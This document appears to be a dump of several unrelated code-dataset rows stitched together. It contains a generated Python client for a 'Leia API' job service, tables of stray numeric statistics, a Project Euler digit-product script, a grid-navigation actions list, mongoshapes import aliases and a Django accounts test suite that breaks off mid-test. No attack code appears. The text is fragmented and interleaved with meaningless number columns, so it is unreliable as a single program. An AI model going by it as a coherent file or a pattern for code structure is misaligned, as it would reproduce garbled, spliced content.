    :param str callback_url: URL POSTed with the Job when it reaches PROCESSED/FAILED/CANCELED
    :param bool block_processing: If true, blocks processing until /job/{id}/start is called
    :return: Job
        If the method is called asynchronously, returns the request thread.
    """
    # Every keyword this endpoint understands, including client controls.
    accepted = {'token', 'execute_after_id', 'body', 'callback_url',
                'block_processing', 'async_req', '_return_http_data_only',
                '_preload_content', '_request_timeout'}
    params = {'token': token, 'execute_after_id': execute_after_id}
    for name, value in six.iteritems(kwargs):
        if name not in accepted:
            raise TypeError(
                "Got an unexpected keyword argument '%s'"
                " to method create_conditional_job" % name
            )
        params[name] = value
    # Required parameters must be present and non-None.
    if params.get('token') is None:
        raise ValueError("Missing the required parameter `token` when calling `create_conditional_job`")  # noqa: E501
    if params.get('execute_after_id') is None:
        raise ValueError("Missing the required parameter `execute_after_id` when calling `create_conditional_job`")  # noqa: E501
    # Optional filters become query parameters, in declaration order.
    query_params = [(name, params[name])
                    for name in ('callback_url', 'block_processing')
                    if name in params]
    header_params = {
        'token': params['token'],
        # This endpoint both accepts and produces JSON.
        'Accept': self.api_client.select_header_accept(['application/json']),  # noqa: E501
        'Content-Type': self.api_client.select_header_content_type(['application/json']),  # noqa: E501
    }
    return self.api_client.call_api(
        '/job/conditional/{execute_after_id}', 'POST',
        {'execute_after_id': params['execute_after_id']},
        query_params,
        header_params,
        body=params.get('body'),
        post_params=[],
        files={},
        response_type='Job',  # noqa: E501
        auth_settings=[],  # token travels in a plain header, no auth scheme
        async_req=params.get('async_req'),
        _return_http_data_only=params.get('_return_http_data_only'),
        _preload_content=params.get('_preload_content', True),
        _request_timeout=params.get('_request_timeout'),
        collection_formats={})
def get_job(self, token, job_id, **kwargs):  # noqa: E501
    """Retrieves a job from Leia API.

    Delegates to ``get_job_with_http_info``. Synchronous by default;
    pass ``async_req=True`` to get the request thread back instead.

    :param async_req bool
    :param str token: The login token obtained via GET /login/{api_key} (required)
    :param str job_id: The id of the job to retrieve (required)
    :return: Job
        If the method is called asynchronously, returns the request thread.
    """
    # Always strip the HTTP envelope so callers receive the data directly.
    kwargs['_return_http_data_only'] = True
    # In async mode the delegate already returns the request thread, so a
    # single delegation covers both paths.
    return self.get_job_with_http_info(token, job_id, **kwargs)  # noqa: E501
def get_job_with_http_info(self, token, job_id, **kwargs):  # noqa: E501
    """Retrieves a job from Leia API.

    Synchronous by default; pass ``async_req=True`` for the request thread.

    :param async_req bool
    :param str token: The login token obtained via GET /login/{api_key} (required)
    :param str job_id: The id of the job to retrieve (required)
    :return: Job
        If the method is called asynchronously, returns the request thread.
    """
    # Every keyword this endpoint understands, including client controls.
    accepted = {'token', 'job_id', 'async_req', '_return_http_data_only',
                '_preload_content', '_request_timeout'}
    params = {'token': token, 'job_id': job_id}
    for name, value in six.iteritems(kwargs):
        if name not in accepted:
            raise TypeError(
                "Got an unexpected keyword argument '%s'"
                " to method get_job" % name
            )
        params[name] = value
    # Required parameters must be present and non-None.
    if params.get('token') is None:
        raise ValueError("Missing the required parameter `token` when calling `get_job`")  # noqa: E501
    if params.get('job_id') is None:
        raise ValueError("Missing the required parameter `job_id` when calling `get_job`")  # noqa: E501
    header_params = {
        'token': params['token'],
        # Server responds with JSON only.
        'Accept': self.api_client.select_header_accept(['application/json']),  # noqa: E501
    }
    return self.api_client.call_api(
        '/job/{job_id}', 'GET',
        {'job_id': params['job_id']},
        [],  # no query parameters for this endpoint
        header_params,
        body=None,
        post_params=[],
        files={},
        response_type='Job',  # noqa: E501
        auth_settings=[],  # token travels in a plain header, no auth scheme
        async_req=params.get('async_req'),
        _return_http_data_only=params.get('_return_http_data_only'),
        _preload_content=params.get('_preload_content', True),
        _request_timeout=params.get('_request_timeout'),
        collection_formats={})
def get_job_statuses(self, token, job_ids, **kwargs):  # noqa: E501
    """Retrieves job statuses from Leia API.

    Delegates to ``get_job_statuses_with_http_info``. Synchronous by
    default; pass ``async_req=True`` to get the request thread back.

    :param async_req bool
    :param str token: The login token obtained via GET /login/{api_key} (required)
    :param list[str] job_ids: The ids of the jobs to retrieve, comma separated (required)
    :return: dict(str, Statuses)
        If the method is called asynchronously, returns the request thread.
    """
    # Always strip the HTTP envelope so callers receive the data directly.
    kwargs['_return_http_data_only'] = True
    # Single delegation: the async path already yields the request thread.
    return self.get_job_statuses_with_http_info(token, job_ids, **kwargs)  # noqa: E501
def get_job_statuses_with_http_info(self, token, job_ids, **kwargs):  # noqa: E501
    """Retrieves a list of job statuses from Leia API.

    Synchronous by default; pass ``async_req=True`` for the request thread.

    :param async_req bool
    :param str token: The login token obtained via GET /login/{api_key} (required)
    :param list[str] job_ids: The ids of the jobs to retrieve, comma separated (required)
    :return: dict(str, Statuses)
        If the method is called asynchronously, returns the request thread.
    """
    # Every keyword this endpoint understands, including client controls.
    accepted = {'token', 'job_ids', 'async_req', '_return_http_data_only',
                '_preload_content', '_request_timeout'}
    params = {'token': token, 'job_ids': job_ids}
    for name, value in six.iteritems(kwargs):
        if name not in accepted:
            raise TypeError(
                "Got an unexpected keyword argument '%s'"
                " to method get_job_statuses" % name
            )
        params[name] = value
    # Required parameters must be present and non-None.
    if params.get('token') is None:
        raise ValueError("Missing the required parameter `token` when calling `get_job_statuses`")  # noqa: E501
    if params.get('job_ids') is None:
        raise ValueError("Missing the required parameter `job_ids` when calling `get_job_statuses`")  # noqa: E501
    header_params = {
        'token': params['token'],
        # Server responds with JSON only.
        'Accept': self.api_client.select_header_accept(['application/json']),  # noqa: E501
    }
    return self.api_client.call_api(
        '/job/{job_ids}/status', 'GET',
        {'job_ids': params['job_ids']},
        [],  # no query parameters for this endpoint
        header_params,
        body=None,
        post_params=[],
        files={},
        response_type='dict(str, Statuses)',  # noqa: E501
        auth_settings=[],  # token travels in a plain header, no auth scheme
        async_req=params.get('async_req'),
        _return_http_data_only=params.get('_return_http_data_only'),
        _preload_content=params.get('_preload_content', True),
        _request_timeout=params.get('_request_timeout'),
        # '' collection format for the multi-valued path parameter, as in
        # the original generated code — TODO confirm how the client joins it.
        collection_formats={'job_ids': ''})
def get_jobs(self, token, **kwargs):  # noqa: E501
    """Retrieves jobs from the system (paginated).

    Delegates to ``get_jobs_with_http_info``. Synchronous by default;
    pass ``async_req=True`` to get the request thread back instead.

    :param async_req bool
    :param str token: The login token obtained via GET /login/{api_key} (required)
    :param str job_id: The id of the job
    :param str application_id: The id of the owner of the documents processed by this job
    :param JobTypes job_type: The type of the job (predict, pdf-images, image-text or transform)
    :param str model_id: The model used by the job (only for predict jobs)
    :param str document_id: The document that the job is processing
    :param str execute_after_id: The job that is a prerequisite for this job to run
    :param str parent_job_id: The job that is the parent of this job
    :param Statuses status: The status of the job
    :param datetime created_after: Keep only jobs created after this UTC timestamp (ISO 8601)
    :param datetime created_before: Keep only jobs created before this UTC timestamp (ISO 8601)
    :param str sort: Comma-separated sort fields; prefix with '-' for descending order
    :param int offset: Number of the first job to send (pagination)
    :param int limit: Maximum number of jobs to send (pagination)
    :return: list[Job]
        If the method is called asynchronously, returns the request thread.
    """
    # Always strip the HTTP envelope so callers receive the data directly.
    kwargs['_return_http_data_only'] = True
    # Single delegation: the async path already yields the request thread.
    return self.get_jobs_with_http_info(token, **kwargs)  # noqa: E501
def get_jobs_with_http_info(self, token, **kwargs):  # noqa: E501
    """Retrieves jobs from the system (paginated).

    Synchronous by default; pass ``async_req=True`` for the request thread.

    :param async_req bool
    :param str token: The login token obtained via GET /login/{api_key} (required)
    :param str job_id: The id of the job
    :param str application_id: The id of the owner of the documents processed by this job
    :param JobTypes job_type: The type of the job (predict, pdf-images, image-text or transform)
    :param str model_id: The model used by the job (only for predict jobs)
    :param str document_id: The document that the job is processing
    :param str execute_after_id: The job that is a prerequisite for this job to run
    :param str parent_job_id: The job that is the parent of this job
    :param Statuses status: The status of the job
    :param datetime created_after: Keep only jobs created after this UTC timestamp (ISO 8601)
    :param datetime created_before: Keep only jobs created before this UTC timestamp (ISO 8601)
    :param str sort: Comma-separated sort fields; prefix with '-' for descending order
    :param int offset: Number of the first job to send (pagination)
    :param int limit: Maximum number of jobs to send (pagination)
    :return: list[Job]
        If the method is called asynchronously, returns the request thread.
    """
    # Optional filters, in the order they must appear in the query string.
    optional_query = ('job_id', 'application_id', 'job_type', 'model_id',
                      'document_id', 'execute_after_id', 'parent_job_id',
                      'status', 'created_after', 'created_before', 'sort',
                      'offset', 'limit')
    accepted = set(optional_query) | {'token', 'async_req',
                                      '_return_http_data_only',
                                      '_preload_content', '_request_timeout'}
    params = {'token': token}
    for name, value in six.iteritems(kwargs):
        if name not in accepted:
            raise TypeError(
                "Got an unexpected keyword argument '%s'"
                " to method get_jobs" % name
            )
        params[name] = value
    # The token is the only required parameter.
    if params.get('token') is None:
        raise ValueError("Missing the required parameter `token` when calling `get_jobs`")  # noqa: E501
    query_params = [(name, params[name])
                    for name in optional_query if name in params]
    header_params = {
        'token': params['token'],
        # Server responds with JSON only.
        'Accept': self.api_client.select_header_accept(['application/json']),  # noqa: E501
    }
    return self.api_client.call_api(
        '/job', 'GET',
        {},  # no path parameters for this endpoint
        query_params,
        header_params,
        body=None,
        post_params=[],
        files={},
        response_type='list[Job]',  # noqa: E501
        auth_settings=[],  # token travels in a plain header, no auth scheme
        async_req=params.get('async_req'),
        _return_http_data_only=params.get('_return_http_data_only'),
        _preload_content=params.get('_preload_content', True),
        _request_timeout=params.get('_request_timeout'),
        collection_formats={})
def start_job(self, token, job_id, **kwargs):  # noqa: E501
    """Starts a job in BLOCKED status within Leia API.

    Delegates to ``start_job_with_http_info``. Synchronous by default;
    pass ``async_req=True`` to get the request thread back instead.

    :param async_req bool
    :param str token: The login token obtained via GET /login/{api_key} (required)
    :param str job_id: The id of the job to start (required)
    :return: Job
        If the method is called asynchronously, returns the request thread.
    """
    # Always strip the HTTP envelope so callers receive the data directly.
    kwargs['_return_http_data_only'] = True
    # Single delegation: the async path already yields the request thread.
    return self.start_job_with_http_info(token, job_id, **kwargs)  # noqa: E501
def start_job_with_http_info(self, token, job_id, **kwargs):  # noqa: E501
    """Triggers a job in BLOCKED status.

    Synchronous by default; pass ``async_req=True`` for the request thread.

    :param async_req bool
    :param str token: The login token obtained via GET /login/{api_key} (required)
    :param str job_id: The id of the job to start (required)
    :return: Job
        If the method is called asynchronously, returns the request thread.
    """
    # Every keyword this endpoint understands, including client controls.
    accepted = {'token', 'job_id', 'async_req', '_return_http_data_only',
                '_preload_content', '_request_timeout'}
    params = {'token': token, 'job_id': job_id}
    for name, value in six.iteritems(kwargs):
        if name not in accepted:
            raise TypeError(
                "Got an unexpected keyword argument '%s'"
                " to method start_job" % name
            )
        params[name] = value
    # Required parameters must be present and non-None.
    if params.get('token') is None:
        raise ValueError("Missing the required parameter `token` when calling `start_job`")  # noqa: E501
    if params.get('job_id') is None:
        raise ValueError("Missing the required parameter `job_id` when calling `start_job`")  # noqa: E501
    header_params = {
        'token': params['token'],
        # Server responds with JSON only.
        'Accept': self.api_client.select_header_accept(['application/json']),  # noqa: E501
    }
    return self.api_client.call_api(
        '/job/{job_id}/start', 'POST',
        {'job_id': params['job_id']},
        [],  # no query parameters for this endpoint
        header_params,
        body=None,
        post_params=[],
        files={},
        response_type='Job',  # noqa: E501
        auth_settings=[],  # token travels in a plain header, no auth scheme
        async_req=params.get('async_req'),
        _return_http_data_only=params.get('_return_http_data_only'),
        _preload_content=params.get('_preload_content', True),
        _request_timeout=params.get('_request_timeout'),
        collection_formats={})
| 53.066291
| 2,615
| 0.643127
| 5,099
| 37,624
| 4.572073
| 0.070798
| 0.038433
| 0.017415
| 0.01853
| 0.939218
| 0.926822
| 0.907991
| 0.892678
| 0.887702
| 0.879252
| 0
| 0.013804
| 0.27028
| 37,624
| 708
| 2,616
| 53.141243
| 0.835331
| 0.495083
| 0
| 0.717678
| 1
| 0
| 0.201072
| 0.030092
| 0
| 0
| 0
| 0
| 0
| 1
| 0.034301
| false
| 0
| 0.010554
| 0
| 0.094987
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 1
| 1
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 9
|
ca5f452ce5ca4c674e94ed5f87ff51d310c0168c
| 1,662
|
py
|
Python
|
c8/c8.py
|
avnish19/project-euler
|
263d60a133174d72e8117671ca61b41156a70191
|
[
"Unlicense"
] | null | null | null |
c8/c8.py
|
avnish19/project-euler
|
263d60a133174d72e8117671ca61b41156a70191
|
[
"Unlicense"
] | null | null | null |
c8/c8.py
|
avnish19/project-euler
|
263d60a133174d72e8117671ca61b41156a70191
|
[
"Unlicense"
] | null | null | null |
#!/usr/bin/python
"""Project Euler problem 8: greatest product of adjacent digits.

Usage: c8.py LENGTH
Prints the LENGTH-digit window of NUM_TO_SEARCH whose digits have the
greatest product, together with that product.
"""
import sys


def prod_of_string(input_string):
    """Return the product of all digits in *input_string* (1 if empty)."""
    prod = 1
    for digit in input_string:
        prod *= int(digit)
    return prod


def largest_product(digits, length):
    """Return ``(best_window, best_product)`` over all *length*-digit windows.

    :param str digits: string of decimal digits to scan
    :param int length: window size
    :return: tuple of the winning substring and its digit product;
        ('0', 0) when no window has a positive product (original sentinels).
    """
    max_product = 0
    max_substring = '0'
    # + 1 so the final window is included: the original loop used
    # range(0, len - length), silently dropping the last substring.
    for start_index in range(len(digits) - length + 1):
        substring = digits[start_index:start_index + length]
        prod = prod_of_string(substring)
        if prod > max_product:
            max_product = prod
            max_substring = substring
    return max_substring, max_product


NUM_TO_SEARCH = '7316717653133062491922511967442657474235534919493496983520312774506326239578318016984801869478851843858615607891129494954595017379583319528532088055111254069874715852386305071569329096329522744304355766896648950445244523161731856403098711121722383113622298934233803081353362766142828064444866452387493035890729629049156044077239071381051585930796086670172427121883998797908792274921901699720888093776657273330010533678812202354218097512545405947522435258490771167055601360483958644670632441572215539753697817977846174064955149290862569321978468622482839722413756570560574902614079729686524145351004748216637048440319989000889524345065854122758866688116427171479924442928230863465674813919123162824586178664583591245665294765456828489128831426076900422421902267105562632111110937054421750694165896040807198403850962455444362981230987879927244284909188845801561660979191338754992005240636899125607176060588611646710940507754100225698315520005593572972571636269561882670428252483600823257530420752963450'


if __name__ == '__main__':
    # Guarded entry point: importing this module no longer reads sys.argv.
    best, product = largest_product(NUM_TO_SEARCH, int(sys.argv[1]))
    print(best, "produces product", product)
| 53.612903
| 1,018
| 0.883875
| 99
| 1,662
| 14.555556
| 0.393939
| 0.03331
| 0.022901
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.658808
| 0.081227
| 1,662
| 30
| 1,019
| 55.4
| 0.284872
| 0.009627
| 0
| 0
| 0
| 0
| 0.650256
| 0.639386
| 0
| 1
| 0
| 0
| 0
| 0
| null | null | 0
| 0.058824
| null | null | 0.058824
| 0
| 0
| 1
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| null | 1
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 8
|
0468189b571100d066abd9af4a99d251fb2cb29b
| 53
|
py
|
Python
|
sample_envs/gridnav/constants/actions.py
|
ericyangyu/DeMAC
|
25e0520e5b4ab3514992fd5b505af283504a80b2
|
[
"MIT"
] | 1
|
2021-11-22T17:30:33.000Z
|
2021-11-22T17:30:33.000Z
|
sample_envs/gridnav/constants/actions.py
|
ericyangyu/DeMAC
|
25e0520e5b4ab3514992fd5b505af283504a80b2
|
[
"MIT"
] | null | null | null |
sample_envs/gridnav/constants/actions.py
|
ericyangyu/DeMAC
|
25e0520e5b4ab3514992fd5b505af283504a80b2
|
[
"MIT"
] | null | null | null |
# Candidate moves for the grid-navigation environment: four unit-step
# deltas plus (0, 0) = stay in place.
# NOTE(review): the axis convention ((dx, dy) vs (row, col)) is not visible
# from this file — confirm against the environment's step logic.
ACTIONS = [(0, -1), (-1, 0), (0, 1), (1, 0), (0, 0)]
| 26.5
| 52
| 0.320755
| 11
| 53
| 1.545455
| 0.272727
| 0.352941
| 0.352941
| 0.470588
| 0.529412
| 0
| 0
| 0
| 0
| 0
| 0
| 0.243902
| 0.226415
| 53
| 1
| 53
| 53
| 0.170732
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| null | 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 1
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 8
|
047d59d634e2b8ccd907072d7a6b47efc764c9e5
| 181
|
py
|
Python
|
tests/func/point/__init__.py
|
phuntimes/mongoshapes
|
f461c67343c32c6b97af8d67a269b4de492d1d71
|
[
"MIT"
] | 1
|
2020-11-26T05:58:23.000Z
|
2020-11-26T05:58:23.000Z
|
tests/func/point/__init__.py
|
Sean-McVeigh/mongoshapes
|
f461c67343c32c6b97af8d67a269b4de492d1d71
|
[
"MIT"
] | null | null | null |
tests/func/point/__init__.py
|
Sean-McVeigh/mongoshapes
|
f461c67343c32c6b97af8d67a269b4de492d1d71
|
[
"MIT"
] | null | null | null |
#!/usr/bin/env python
# -*- coding: utf-8 -*-
"""Re-export the Point shape types under generic Geo* aliases.

GeoShape / GeoDict / GeoField name the Point implementation so code in
this package can refer to "the shape under test" without hard-coding it.
"""
from mongoshapes import Point as GeoShape
from mongoshapes import PointDict as GeoDict
from mongoshapes import PointField as GeoField
| 25.857143
| 46
| 0.779006
| 25
| 181
| 5.64
| 0.68
| 0.319149
| 0.446809
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.006452
| 0.143646
| 181
| 6
| 47
| 30.166667
| 0.903226
| 0.232044
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 0
| 0
| null | 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 7
|
048dcc587e483f79b7d55cb8208de05012cab15c
| 30,823
|
py
|
Python
|
tests/test_logic.py
|
GDGSNF/My-Business
|
792bb13a5b296260e5de7e03fba6445a13922851
|
[
"MIT"
] | 21
|
2020-08-29T14:32:13.000Z
|
2021-08-28T21:40:32.000Z
|
tests/test_logic.py
|
GDGSNF/My-Business
|
792bb13a5b296260e5de7e03fba6445a13922851
|
[
"MIT"
] | 1
|
2020-10-11T21:56:15.000Z
|
2020-10-11T21:56:15.000Z
|
tests/test_logic.py
|
GDGSNF/My-Business
|
792bb13a5b296260e5de7e03fba6445a13922851
|
[
"MIT"
] | 5
|
2020-09-08T00:38:11.000Z
|
2021-04-14T11:17:03.000Z
|
from django.contrib.auth.tokens import default_token_generator as token_generator
from django.test import TestCase
from django.utils.encoding import force_bytes
from django.utils.http import urlsafe_base64_encode
from accounts.models import Account
class AccountsLoginTestCase(TestCase):
fixtures = ["tests/test_data/accounts.json", "core/fixtures/initial_data.json"]
def setUp(self):
"""Set up accounts"""
self.user = Account.objects.get(is_superuser=False)
self.superuser = Account.objects.get(is_superuser=True)
def test_template(self):
"""Check login template"""
response = self.client.get("/accounts/login/", follow=True)
self.assertTemplateUsed(response, template_name="accounts/login.html")
def test_successful(self):
"""Check login successful"""
response = self.client.post(
"/accounts/login/",
{"email": self.user.email, "password": "test_user123"},
follow=True,
)
self.assertContains(
response,
f"Welcome back, {self.user.first_name}! You have successfully logged in.",
)
self.client.logout()
response = self.client.post(
"/accounts/login/",
{"email": self.superuser.email, "password": "test_superuser123"},
follow=True,
)
self.assertContains(
response,
f"Welcome back, {self.superuser.first_name}! You have successfully logged in.",
)
def test_incorrect_active(self):
"""Check login unsuccessful (is_active)"""
self.user.is_active = False
self.superuser.is_active = False
self.user.save()
self.superuser.save()
response = self.client.post(
"/accounts/login/",
{"email": self.user.email, "password": "test_user123"},
follow=True,
)
self.assertContains(response, "Your account has not been activated.")
response = self.client.post(
"/accounts/login/",
{"email": self.superuser.email, "password": "test_superuser123"},
follow=True,
)
self.assertContains(response, "Your account has not been activated.")
def test_incorrect_email(self):
"""Check login unsuccessful (email)"""
response = self.client.post(
"/accounts/login/",
{"email": self.user.email + "1", "password": "test_user123"},
follow=True,
)
self.assertContains(
response, "The email and/or password you entered are incorrect."
)
response = self.client.post(
"/accounts/login/",
{"email": self.superuser.email + "1", "password": "test_superuser123"},
follow=True,
)
self.assertContains(
response, "The email and/or password you entered are incorrect."
)
response = self.client.post(
"/accounts/login/",
{"email": "", "password": "test_superuser123"},
follow=True,
)
self.assertContains(response, "This field is required.")
def test_incorrect_password(self):
"""Check login unsuccessful (password)"""
response = self.client.post(
"/accounts/login/",
{"email": self.user.email, "password": "test_user12345"},
follow=True,
)
self.assertContains(
response, "The email and/or password you entered are incorrect."
)
response = self.client.post(
"/accounts/login/", {"email": self.user.email, "password": ""}, follow=True,
)
self.assertContains(response, "This field is required.")
response = self.client.post(
"/accounts/login/",
{"email": self.superuser.email, "password": "test_superuser12345"},
follow=True,
)
self.assertContains(
response, "The email and/or password you entered are incorrect."
)
response = self.client.post(
"/accounts/login/",
{"email": self.superuser.email, "password": ""},
follow=True,
)
self.assertContains(response, "This field is required.")
def test_already_logged_in(self):
"""Check login unsuccessful (logged in)"""
self.client.force_login(self.user)
response = self.client.get("/accounts/login/", follow=True)
self.assertContains(response, "You are already logged in!")
self.client.force_login(self.superuser)
response = self.client.get("/accounts/login/", follow=True)
class AccountsLogoutTestCase(TestCase):
fixtures = ["tests/test_data/accounts.json", "core/fixtures/initial_data.json"]
def setUp(self):
"""Set up accounts"""
self.user = Account.objects.get(is_superuser=False)
self.superuser = Account.objects.get(is_superuser=True)
def test_successful(self):
"""Check logout successful"""
self.client.force_login(self.user)
response = self.client.get("/accounts/logout/", follow=True)
self.assertContains(response, "You have successfully logged out.")
self.client.force_login(self.superuser)
response = self.client.get("/accounts/logout/", follow=True)
self.assertContains(response, "You have successfully logged out.")
def test_warning(self):
"""Check logout successful (warning)"""
response = self.client.get("/accounts/logout/", follow=True)
self.assertContains(response, "You are already logged out!")
class AccountsPasswordResetTestCase(TestCase):
fixtures = ["tests/test_data/accounts.json", "core/fixtures/initial_data.json"]
def setUp(self):
"""Set up accounts"""
self.user = Account.objects.get(is_superuser=False)
self.superuser = Account.objects.get(is_superuser=True)
def test_template(self):
"""Check password reset template"""
response = self.client.get("/accounts/password/reset/", follow=True)
self.assertTemplateUsed(response, template_name="accounts/password/reset.html")
def test_successful(self):
"""Check password reset successful"""
response = self.client.post(
"/accounts/password/reset/", {"email": self.user.email}, follow=True
)
self.assertContains(
response, "You have successfully requested a password reset."
)
response = self.client.post(
"/accounts/password/reset/", {"email": self.superuser.email}, follow=True
)
self.assertContains(
response, "You have successfully requested a password reset."
)
def test_redirect(self):
"""Check password reset redirect"""
self.client.force_login(self.user)
response = self.client.get(f"/accounts/password/reset/", follow=True)
self.assertContains(
response,
"You have been redirected to change your password because you are logged in!",
)
self.client.force_login(self.superuser)
response = self.client.get(f"/accounts/password/reset/", follow=True)
self.assertContains(
response,
"You have been redirected to change your password because you are logged in!",
)
def test_incorrect_email(self):
"""Check password reset unsuccessful (email)"""
response = self.client.post(
"/accounts/password/reset/", {"email": ""}, follow=True
)
self.assertContains(response, "This field is required.")
response = self.client.post(
"/accounts/password/reset/",
{"email": "stefan.business@example.com"},
follow=True,
)
self.assertContains(
response, "The email is not associated with any active accounts."
)
class AccountsPasswordResetConfirmTestCase(TestCase):
fixtures = ["tests/test_data/accounts.json", "core/fixtures/initial_data.json"]
def setUp(self):
"""Set up accounts"""
self.user = Account.objects.get(is_superuser=False)
self.superuser = Account.objects.get(is_superuser=True)
def test_template(self):
"""Check password reset confirm template"""
response = self.client.get(
f"/accounts/password/reset/{urlsafe_base64_encode(force_bytes(self.user.uid))}/{token_generator.make_token(self.user)}/",
follow=True,
)
self.assertTemplateUsed(response, template_name="accounts/password/reset.html")
def test_valid(self):
"""Check password reset confirm valid"""
response = self.client.get(
f"/accounts/password/reset/{urlsafe_base64_encode(force_bytes(self.user.uid))}/{token_generator.make_token(self.user)}/",
follow=True,
)
self.assertContains(response, "Verify New Password")
response = self.client.get(
f"/accounts/password/reset/{urlsafe_base64_encode(force_bytes(self.superuser.uid))}/{token_generator.make_token(self.superuser)}/",
follow=True,
)
self.assertContains(response, "Verify New Password")
def test_successful(self):
"""Check password reset confirm successful"""
response = self.client.post(
f"/accounts/password/reset/{urlsafe_base64_encode(force_bytes(self.user.uid))}/{token_generator.make_token(self.user)}/",
{
"new_password": "test_password123",
"verify_new_password": "test_password123",
},
follow=True,
)
self.assertContains(response, "You have successfully reset your password.")
self.client.login(email=self.user.email, password="test_password123")
self.client.logout()
response = self.client.post(
f"/accounts/password/reset/{urlsafe_base64_encode(force_bytes(self.superuser.uid))}/{token_generator.make_token(self.superuser)}/",
{
"new_password": "test_password123",
"verify_new_password": "test_password123",
},
follow=True,
)
self.assertContains(response, "You have successfully reset your password.")
self.client.login(email=self.superuser.email, password="test_password123")
def test_redirect(self):
"""Check password reset confirm redirect"""
self.client.force_login(self.user)
response = self.client.get(
f"/accounts/password/reset/{urlsafe_base64_encode(force_bytes(self.user.uid))}/{token_generator.make_token(self.user)}/",
follow=True,
)
self.assertContains(
response,
"You have been redirected to change your password because you are logged in!",
)
self.client.force_login(self.superuser)
response = self.client.get(
f"/accounts/password/reset/{urlsafe_base64_encode(force_bytes(self.superuser.uid))}/{token_generator.make_token(self.superuser)}/",
follow=True,
)
self.assertContains(
response,
"You have been redirected to change your password because you are logged in!",
)
def test_incorrect_password(self):
"""Check password reset confirm unsuccessful (incorrect)"""
response = self.client.post(
f"/accounts/password/reset/{urlsafe_base64_encode(force_bytes(self.user.uid))}/{token_generator.make_token(self.user)}/",
{
"new_password": "test_password123",
"verify_new_password": "test_password",
},
follow=True,
)
self.assertContains(response, "The passwords do not match.")
response = self.client.post(
f"/accounts/password/reset/{urlsafe_base64_encode(force_bytes(self.user.uid))}/{token_generator.make_token(self.user)}/",
{"new_password": "", "verify_new_password": ""},
follow=True,
)
self.assertContains(response, "This field is required.")
response = self.client.post(
f"/accounts/password/reset/{urlsafe_base64_encode(force_bytes(self.user.uid))}/{token_generator.make_token(self.user)}/",
{"new_password": "test_password", "verify_new_password": "test_password"},
follow=True,
)
self.assertContains(
response,
"The password needs to have at least 8 characters, a letter, and a number.",
)
def test_incorrect_token(self):
"""Check password reset confirm unsuccessful (token)"""
response = self.client.get(
f"/accounts/password/reset/MA245/{token_generator.make_token(self.user)}/",
follow=True,
)
self.assertContains(response, "The request is invalid.")
response = self.client.get(
f"/accounts/password/reset/{urlsafe_base64_encode(force_bytes(self.user.uid))}/123412/",
follow=True,
)
self.assertContains(response, "The request is invalid.")
class AccountsPasswordChangeTestCase(TestCase):
fixtures = ["tests/test_data/accounts.json", "core/fixtures/initial_data.json"]
def setUp(self):
"""Set up accounts"""
self.user = Account.objects.get(is_superuser=False)
self.superuser = Account.objects.get(is_superuser=True)
def test_template(self):
"""Check password change template"""
self.client.force_login(self.user)
response = self.client.get(
f"/accounts/{self.user.uid}/password/change/", follow=True
)
self.assertTemplateUsed(response, template_name="accounts/password/change.html")
def test_successful(self):
"""Check password change successful"""
self.client.force_login(self.user)
response = self.client.post(
f"/accounts/{self.user.uid}/password/change/",
{
"new_password": "test_password123",
"verify_new_password": "test_password123",
},
follow=True,
)
self.assertContains(response, "You have successfully changed your password.")
self.client.login(email=self.user.email, password="test_password123")
self.client.force_login(self.superuser)
response = self.client.post(
f"/accounts/{self.superuser.uid}/password/change/",
{
"new_password": "test_password123",
"verify_new_password": "test_password123",
},
follow=True,
)
self.assertContains(response, "You have successfully changed your password.")
self.client.login(email=self.superuser.email, password="test_password123")
def test_incorrect_permissions(self):
"""Check password change unsuccessful (permissions)"""
self.client.force_login(self.user)
response = self.client.get(
f"/accounts/{self.user.uid}/password/change/", follow=True
)
self.assertContains(response, "Verify New Password")
response = self.client.get(
f"/accounts/{self.superuser.uid}/password/change/", follow=True
)
self.assertContains(response, "You don't have the required permissions.")
self.client.force_login(self.superuser)
response = self.client.get(
f"/accounts/{self.user.uid}/password/change/", follow=True
)
self.assertContains(response, "Verify New Password")
response = self.client.get(
f"/accounts/{self.superuser.uid}/password/change/", follow=True
)
self.assertContains(response, "Verify New Password")
def test_incorrect_password(self):
"""Check password change unsuccessful (incorrect)"""
self.client.force_login(self.user)
response = self.client.post(
f"/accounts/{self.user.uid}/password/change/",
{
"new_password": "test_password123",
"verify_new_password": "test_password12345",
},
follow=True,
)
self.assertContains(response, "The passwords do not match.")
response = self.client.post(
f"/accounts/{self.user.uid}/password/change/",
{"new_password": "", "verify_new_password": ""},
follow=True,
)
self.assertContains(response, "This field is required.")
response = self.client.post(
f"/accounts/{self.user.uid}/password/change/",
{"new_password": "test_password", "verify_new_password": "test_password"},
follow=True,
)
self.assertContains(
response,
"The password needs to have at least 8 characters, a letter, and a number.",
)
self.client.force_login(self.superuser)
response = self.client.post(
f"/accounts/{self.superuser.uid}/password/change/",
{
"new_password": "test_password123",
"verify_new_password": "test_password12345",
},
follow=True,
)
